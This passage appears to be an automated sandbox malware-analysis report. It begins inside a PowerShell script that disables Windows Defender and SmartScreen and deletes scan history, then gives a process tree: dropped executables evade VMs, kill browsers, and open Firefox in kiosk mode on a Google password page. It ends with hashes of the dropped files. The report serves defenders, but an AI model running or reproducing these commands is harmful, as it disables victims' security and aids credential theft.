     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
          4⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4872
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1168
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4664
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" start TrustedInstaller
            5⤵
            • System Location Discovery: System Language Discovery
            PID:6104
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 2800
          4⤵
          • Program crash
          PID:1684
      • C:\Users\Admin\AppData\Local\Temp\1013681001\870ff8aaf6.exe
        "C:\Users\Admin\AppData\Local\Temp\1013681001\870ff8aaf6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2376
      • C:\Users\Admin\AppData\Local\Temp\1013682001\5a94fa8bf8.exe
        "C:\Users\Admin\AppData\Local\Temp\1013682001\5a94fa8bf8.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2668
      • C:\Users\Admin\AppData\Local\Temp\1013683001\fa50489967.exe
        "C:\Users\Admin\AppData\Local\Temp\1013683001\fa50489967.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2644
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3068
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2960
          • C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            5⤵
              PID:1800
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4432
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            4⤵
              PID:2076
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                PID:2084
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae5abf5e-7f75-400a-b99d-c1428ff4a2ae} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" gpu
                  6⤵
                    PID:1832
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cde397a-a98e-49ad-9374-7ad11a540cb9} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" socket
                    6⤵
                      PID:1468
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2660 -childID 1 -isForBrowser -prefsHandle 3020 -prefMapHandle 1496 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afa44429-39b5-41f7-babb-2a8b902489ca} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
                      6⤵
                        PID:3960
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3752 -childID 2 -isForBrowser -prefsHandle 3768 -prefMapHandle 3764 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27ec7000-da0f-4550-84f6-6fb81570ec09} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
                        6⤵
                          PID:380
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4932 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4984 -prefMapHandle 4980 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae695323-e05f-4b75-8b0b-5865a03bbc20} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" utility
                          6⤵
                          • Checks processor information in registry
                          PID:5908
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5128 -childID 3 -isForBrowser -prefsHandle 5116 -prefMapHandle 5112 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df7eb14f-b6d4-4f06-a6ec-0f91407a43c9} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
                          6⤵
                            PID:5924
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 4 -isForBrowser -prefsHandle 5272 -prefMapHandle 5280 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a25248d8-98eb-4854-b46f-b814fb4dc6bf} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
                            6⤵
                              PID:5944
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5364 -childID 5 -isForBrowser -prefsHandle 5460 -prefMapHandle 5456 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c67a7d0-7765-4c4a-8b0a-3f6c71594795} 2084 "\\.\pipe\gecko-crash-server-pipe.2084" tab
                              6⤵
                                PID:6060
                        • C:\Users\Admin\AppData\Local\Temp\1013684001\b90279102d.exe
                          "C:\Users\Admin\AppData\Local\Temp\1013684001\b90279102d.exe"
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2836
                        • C:\Users\Admin\AppData\Local\Temp\1013685001\e5d145daee.exe
                          "C:\Users\Admin\AppData\Local\Temp\1013685001\e5d145daee.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3556
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3556 -s 584
                            4⤵
                            • Program crash
                            PID:5040
                    • C:\Windows\servicing\TrustedInstaller.exe
                      C:\Windows\servicing\TrustedInstaller.exe
                      1⤵
                        PID:3048
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3588
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\system32\sc.exe" qc windefend
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:5860
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5856
                          • C:\Windows\SysWOW64\whoami.exe
                            "C:\Windows\system32\whoami.exe" /groups
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4740
                          • C:\Windows\SysWOW64\net1.exe
                            "C:\Windows\system32\net1.exe" stop windefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4468
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:4084
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4288
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\system32\sc.exe" qc windefend
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:5568
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5848
                          • C:\Windows\SysWOW64\whoami.exe
                            "C:\Windows\system32\whoami.exe" /groups
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:6028
                          • C:\Windows\SysWOW64\net1.exe
                            "C:\Windows\system32\net1.exe" stop windefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:6016
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:3516
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 860 -ip 860
                        1⤵
                          PID:3820
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3172 -ip 3172
                          1⤵
                            PID:4116
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3992 -ip 3992
                            1⤵
                              PID:6080
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6092
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3556 -ip 3556
                              1⤵
                                PID:4836
                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious behavior: EnumeratesProcesses
                                PID:404

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                Filesize

                                1KB

                                MD5

                                def65711d78669d7f8e69313be4acf2e

                                SHA1

                                6522ebf1de09eeb981e270bd95114bc69a49cda6

                                SHA256

                                aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                SHA512

                                05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8R55UT9S\download[1].htm

                                Filesize

                                1B

                                MD5

                                cfcd208495d565ef66e7dff9f98764da

                                SHA1

                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                SHA256

                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                SHA512

                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                21KB

                                MD5

                                0023f9a03fd95c53ee1e822785748e3c

                                SHA1

                                a8c953915dbbbf9607698e2998f25fa4aa2d585b

                                SHA256

                                8066cab34569329b73e4aee06af4d7f6523a094fd20517741c9eb95558928022

                                SHA512

                                272d5cca2671d4b88d8fc1c16a91714719b0e6b273265cf5e731ba0efe52175e7bc3c8285cd0c6bcccea6e2c1be4f885c9e05c79e8c20b903b5155f00d00ad04

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\activity-stream.discovery_stream.json.tmp

                                Filesize

                                19KB

                                MD5

                                f21e50e8ceb09f51a5eef1f2c471aa20

                                SHA1

                                450939965dcb27ac1263e7eff02ff6152ca9b976

                                SHA256

                                91c7b7ff8779cbeb2f9869c0d95f76fab28f2732fb8f76c57dd0bc71e8129fe7

                                SHA512

                                fb7c5f1cf76e0457eec5369223cf8fd0fd1601c6f9588347a33e330187506fabbd9b9d857c254eeb53e1e68499d7f7b4c4771bda469d340f43c4ee41dcc95a64

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                                Filesize

                                13KB

                                MD5

                                0e03d5dddbc4a2c49786a3508ee600fa

                                SHA1

                                a475b295e780fd98d6c47cae921372056dbbdf11

                                SHA256

                                025663abed2e1dc8709961ba5b13983aba2248b6bb0baee0693a8ad84eaec3b7

                                SHA512

                                ef593959ab7ee136a7ec34a79307c4551e21ba792444af8e7db72d2e87b4090a16968f300865d805b09b42e8a2f7e031e464dcc25f613283ff228161f35c8112

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                Filesize

                                15KB

                                MD5

                                96c542dec016d9ec1ecc4dddfcbaac66

                                SHA1

                                6199f7648bb744efa58acf7b96fee85d938389e4

                                SHA256

                                7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                SHA512

                                cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                              • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe

                                Filesize

                                2.5MB

                                MD5

                                2a78ce9f3872f5e591d643459cabe476

                                SHA1

                                9ac947dfc71a868bc9c2eb2bd78dfb433067682e

                                SHA256

                                21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae

                                SHA512

                                03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

                              • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe

                                Filesize

                                1.7MB

                                MD5

                                40f8c17c136d4dc83b130c9467cf6dcc

                                SHA1

                                e9b6049aa7da0af9718f2f4ae91653d9bac403bb

                                SHA256

                                cafb60920939bd2079d96f2e6e73f87632bc15bd72998f864e8968f7aab9623b

                                SHA512

                                6760a0752957535ec45ce3307e31569ac263eb73157d6a424d6e30647651a4e93db7c0378028d9e0ce07e65a357d2bb81047064ccda2f6a13fa7402ee7794c2d

                              • C:\Users\Admin\AppData\Local\Temp\1013681001\870ff8aaf6.exe

                                Filesize

                                1.8MB

                                MD5

                                28cd41e552164efdf6eaf4c5f00b7821

                                SHA1

                                b16422716ca83c131c1cbd6c6fd4c1a8fdfa800b

                                SHA256

                                07224a91d2fc05f6b417caaa70c22da0c49d553b0d68f36270f05990dc0eb2ac

                                SHA512

                                91074cddf0b9411579d07c46058e6429b92cb3cd97932b0f5036f0f8f6b8b2ad4b609bd2caa3c5aaee7f5d1b88b051c9efc8bd3c97b132002ea8f9f11edb1178

                              • C:\Users\Admin\AppData\Local\Temp\1013682001\5a94fa8bf8.exe

                                Filesize

                                1.7MB

                                MD5

                                319888df2e3f79f5dd0a3cdbfccddc03

                                SHA1

                                0196ee658ff0320a5caca2d3d99d8365aebd2ab5

                                SHA256

                                7748b1bcb3e80de9058f023a7a490b9bdf9bbdab59b17c3351a84feb21c6056d

                                SHA512

                                37a8116026113102bee0e0dcee9833774fff2372f4ab5dbab210aafc2daed8e961fdaa1458a8c0dec8a5c0561cfeecebd7cc31755f522b2735c8e4389fe0d1ae

                              • C:\Users\Admin\AppData\Local\Temp\1013683001\fa50489967.exe

                                Filesize

                                945KB

                                MD5

                                965df7e678a228fea2b2966ad816c837

                                SHA1

                                a360356aefca30a227c816072c2c57220e78e6f8

                                SHA256

                                423451ad973a9b1b5af5bad45160a50c6f842b7fa70ce189d3d09f2fccc42b63

                                SHA512

                                abf08a3adbc3611f5ac0416ea374e8b22491914df6ddc543096e966efc0a57726c36f4eb8b210f7639a44f813f5cf63349a634e6b81036af374793951eb54cf9

                              • C:\Users\Admin\AppData\Local\Temp\1013684001\b90279102d.exe

                                Filesize

                                2.7MB

                                MD5

                                0b1d6a5c334e4ba1ffc4e7e8e59d182b

                                SHA1

                                e241c9cbe4ec0fb12c4433987b9c83278d7f649b

                                SHA256

                                7ea0c446d291e2d665222b38a85336c08fc18f0a50236c23dbdbb49e17db7606

                                SHA512

                                0d8f3e42b3ad2f0a69fee7e8e4fc2b400af40d287598d57bafa2fbb13dbc17d24688a6dcbee592935dd127bfdaf394a4b855fcaceda1b305cde5a30a0e49dfd3

                              • C:\Users\Admin\AppData\Local\Temp\1013685001\e5d145daee.exe

                                Filesize

                                1.9MB

                                MD5

                                5abd444028545a70ac140f6c244f0da8

                                SHA1

                                5b46c706dfe9f4f443a894d746a76020a1835077

                                SHA256

                                03704ac5905c8ed32d791115ac52f119286075a5d25e3be6724f3b990c3f6361

                                SHA512

                                94b8033182016b9eff96e2360656c54724df879ac0f071c9fc2d95a07b012b462592813940d7623a100b6bbac6689ec461cccacb6cf316bd7981cb8a48c19652

                              • C:\Users\Admin\AppData\Local\Temp\ClientAny.exe

                                Filesize

                                71KB

                                MD5

                                958cfc3e7730a66a05d6b8a49ce13d63

                                SHA1

                                ebc55f86cccfead463fcc1e6a060a5012fb09907

                                SHA256

                                eedce349ce30bae2c269040ac02e0c1d2a979cd2743dc89dc8138e61b30f1798

                                SHA512

                                cd6c4f6229a5d97a9b335cbbaf16e4ceab2efde6dd6e17ea0e8645d12739bd2a7ab8e6a77887dd92894af17305df6aafd051c0bfdd8fe7965225f0d538d9fbc5

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_irnb2puc.t3p.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                Filesize

                                3.1MB

                                MD5

                                9aba31b7a6b0d1afa4b290557ad5b6fb

                                SHA1

                                09d2f60eef3abb4c20394fd8369b32846456c533

                                SHA256

                                9b1fad1eb049d54f44103ba67be774b96d2cfd82eeb5ec72aadd20ec29d846f8

                                SHA512

                                a6df82bd55a8a45f5057fdc4ee9249fd11120854037157f5202ea282205798b309eb513ea62cec2de3e67ba2b7e64cbb3a852e3b57ddf361288c0843b039634f

                              • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                Filesize

                                479KB

                                MD5

                                09372174e83dbbf696ee732fd2e875bb

                                SHA1

                                ba360186ba650a769f9303f48b7200fb5eaccee1

                                SHA256

                                c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                SHA512

                                b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                              • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                Filesize

                                13.8MB

                                MD5

                                0a8747a2ac9ac08ae9508f36c6d75692

                                SHA1

                                b287a96fd6cc12433adb42193dfe06111c38eaf0

                                SHA256

                                32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                SHA512

                                59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

                                Filesize

                                7KB

                                MD5

                                f528b453f3759dfd3b2638d09b1f4cc4

                                SHA1

                                26a43d60a7f43ba95acb7bd574e1becdf4587d05

                                SHA256

                                018f656874ed308ea99594ccbde84234ec627d4c5885ebe8c410376a5b0cb4d4

                                SHA512

                                7e7c8dcb2543ad529b6310f104d880e6447c8d95f929b4266285059f2a1bd176af6454037b0d89c59d8f9f8afbcb90be10697274cdf281565f478b91060101e2

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\AlternateServices.bin

                                Filesize

                                8KB

                                MD5

                                e75a81a43905e89b8c88a4efc376cc6f

                                SHA1

                                fe8bbb302d9758ac2c1d396e34eaae6b8fd9fb63

                                SHA256

                                e8b0e736fc1aac8b0a3798bd140c710d2adc6eb29e51ccd7d73cfd688c847a37

                                SHA512

                                43e737c6b253552b9637fee79e053cb468e6a98ea295b835f9f8b74001696949bce6e00fe50aeaee36733c6fa5b1bbf984ee2b355c536d2dd24815f945bbc322

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

                                Filesize

                                5KB

                                MD5

                                4946777d34bc417d0ad0f86d27eb61b7

                                SHA1

